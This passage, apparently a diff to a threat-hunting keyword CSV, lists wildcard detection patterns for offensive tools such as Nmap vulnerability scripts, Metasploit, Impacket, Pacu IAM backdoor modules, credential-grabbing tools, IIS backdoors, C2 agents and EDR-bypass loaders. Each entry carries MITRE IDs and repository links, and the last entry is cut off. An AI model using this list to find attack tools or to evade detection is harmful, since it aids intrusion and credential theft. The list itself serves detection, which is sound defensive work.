+"*/http-vmware-path-vuln.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-vuln-cve2006-3392.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-vuln-cve2009-3960.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-vuln-cve2010-0738.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-vuln-cve2010-2861.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-vuln-cve2011-3192.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-vuln-cve2011-3368.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-vuln-cve2012-1823.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-vuln-cve2013-0156.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-vuln-cve2013-6786.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-vuln-cve2013-7091.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-vuln-cve2014-2126.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-vuln-cve2014-2127.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-vuln-cve2014-2128.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-vuln-cve2014-2129.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-vuln-cve2014-3704.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-vuln-cve2014-8877.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-vuln-cve2015-1427.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-vuln-cve2015-1635.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-vuln-cve2017-1001000.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-vuln-cve2017-5638.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-vuln-cve2017-5689.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-vuln-cve2017-8917.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-vulners-regex.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/vulnersCom/nmap-vulners","1","1","N/A","N/A","10","3003","527","2022-12-16T11:22:30Z","2017-12-19T21:21:28Z"
+"*/http-vuln-misfortune-cookie.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-vuln-wnr1000-creds.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-waf-detect.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-waf-fingerprint.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-webdav-scan.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-wordpress-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-wordpress-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-wordpress-users.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-xssed.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/huan.exe *","offensive_tool_keyword","Huan","Huan is an encrypted PE Loader Generator that I developed for learning PE file structure and PE loading processes. It encrypts the PE file to be run with different keys each time and embeds it in a new section of the loader binary. Currently. it works on 64 bit PE files.","T1027 - T1036 - T1564 - T1003 - T1056 - T1204 - T1588 - T1620","TA0002 - TA0008 - ","N/A","N/A","Exploitation tools","https://github.com/frkngksl/Huan","1","0","N/A","N/A","6","518","103","2021-08-13T10:48:26Z","2021-05-21T08:55:02Z"
+"*/HuanLoader/*","offensive_tool_keyword","Huan","Huan is an encrypted PE Loader Generator that I developed for learning PE file structure and PE loading processes. It encrypts the PE file to be run with different keys each time and embeds it in a new section of the loader binary. Currently. 
it works on 64 bit PE files.","T1027 - T1036 - T1564 - T1003 - T1056 - T1204 - T1588 - T1620","TA0002 - TA0008 - ","N/A","N/A","Exploitation tools","https://github.com/frkngksl/Huan","1","1","N/A","N/A","6","518","103","2021-08-13T10:48:26Z","2021-05-21T08:55:02Z"
+"*/HWSyscalls.cpp*","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tool","https://github.com/florylsk/NtRemoteLoad","1","1","N/A","10","2","175","35","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z"
+"*/hyperion.exe*","offensive_tool_keyword","hyperion","A runtime PE-Crypter - The crypter is started via the command line and encrypts an input executable with AES-128. The encrypted file decrypts itself on startup (bruteforcing the AES key which may take a few seconds)","T1027.002 - T1059.001 - T1116","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://www.kali.org/tools/hyperion/","1","1","N/A","10","10","N/A","N/A","N/A","N/A"
+"*/Hypnos.git*","offensive_tool_keyword","Hypnos","indirect syscalls - the Win API functions are not hooked by AV/EDR - bypass EDR detections","T1055.012 - T1136.001 - T1070.004 - T1055.001","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/CaptainNox/Hypnos","1","1","N/A","10","1","49","5","2023-08-22T20:17:31Z","2023-07-11T09:07:10Z"
+"*/hypobrychium.git*","offensive_tool_keyword","hypobrychium","hypobrychium AV/EDR Bypass","T1562.001 - T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/foxlox/hypobrychium","1","1","N/A","8","1","72","21","2023-07-21T21:13:20Z","2023-07-18T09:55:07Z"
+"*/iam__backdoor_users_password*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - 
TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z"
+"*/iam__bruteforce_permissions/*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z"
+"*/iam__privesc_scan*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z"
+"*/iax2-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/iax2-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/icap-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/icebreaker.git*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","1","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z"
+"*/icebreaker.py*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","1","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z"
+"*/IDiagnosticProfileUAC*","offensive_tool_keyword","IDiagnosticProfileUAC","UAC bypass using auto-elevated COM object Virtual Factory for DiagCpl","T1548.002 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/Wh04m1001/IDiagnosticProfileUAC","1","1","N/A","10","2","173","32","2022-07-02T20:31:47Z","2022-07-02T19:55:42Z"
+"*/iec-identify.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/ielocalserver.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*/ieshell32.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*/iis_controller.py*","offensive_tool_keyword","IIS-Raid","A native backdoor module for Microsoft IIS","T1505.003 - T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/0x09AL/IIS-Raid","1","1","N/A","10","10","510","127","2020-07-03T13:31:42Z","2020-02-17T16:28:10Z"
+"*/IIS-Raid.git*","offensive_tool_keyword","IIS-Raid","A native backdoor module for Microsoft IIS","T1505.003 - T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/0x09AL/IIS-Raid","1","1","N/A","10","10","510","127","2020-07-03T13:31:42Z","2020-02-17T16:28:10Z"
+"*/ike-crack.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*/IKEForce*","offensive_tool_keyword","IKEForce","IKEForce is a command line IPSEC VPN brute forcing tool for Linux that allows group name/ID enumeration and XAUTH brute forcing capabilities.","T1110 - T1201 - T1018","TA0001 - TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/SpiderLabs/ikeforce","1","0","N/A","N/A","3","226","73","2019-09-18T09:35:41Z","2014-09-12T01:11:00Z"
+"*/ike-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/imap-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/imap-capabilities.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/imap-ntlm-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/imfiver/CVE-2022-0847*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/imfiver/CVE-2022-0847","1","1","N/A","N/A","3","257","74","2023-02-02T02:17:30Z","2022-03-07T18:36:50Z" +"*/impacket.*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*/impacket/*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*/impersonate.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/impersonate-rs*","offensive_tool_keyword","impersonate-rs","Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI","T1134 - T1003 - T1008 - T1071","TA0004 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/zblurx/impersonate-rs","1","1","N/A","N/A","1","78","4","2023-06-15T15:33:49Z","2023-01-30T17:11:14Z" +"*/imperun * *cmd.exe /c whoami*","offensive_tool_keyword","Nightmangle","ightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/1N73LL1G3NC3x/Nightmangle","1","0","N/A","10","10","73","10","2023-09-26T19:21:31Z","2023-09-26T18:25:23Z" +"*/Imperva_gzip_WAF_Bypass*","offensive_tool_keyword","Imperva_gzip_WAF_Bypass","Imperva Cloud WAF was vulnerable to a bypass that allows attackers to evade WAF rules when sending malicious HTTP POST payloads. such as log4j exploits. SQL injection. command execution. 
directory traversal. XXE. etc.","T1190 - T1210 - T1506 - T1061 - T1071 - T1100 - T1220","TA0001 - TA0002 - TA0003 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/BishopFox/Imperva_gzip_WAF_Bypass","1","1","N/A","N/A","2","146","29","2022-01-07T17:39:29Z","2022-01-07T17:38:33Z" +"*/implant/callback*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" +"*/implant/elevate/*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 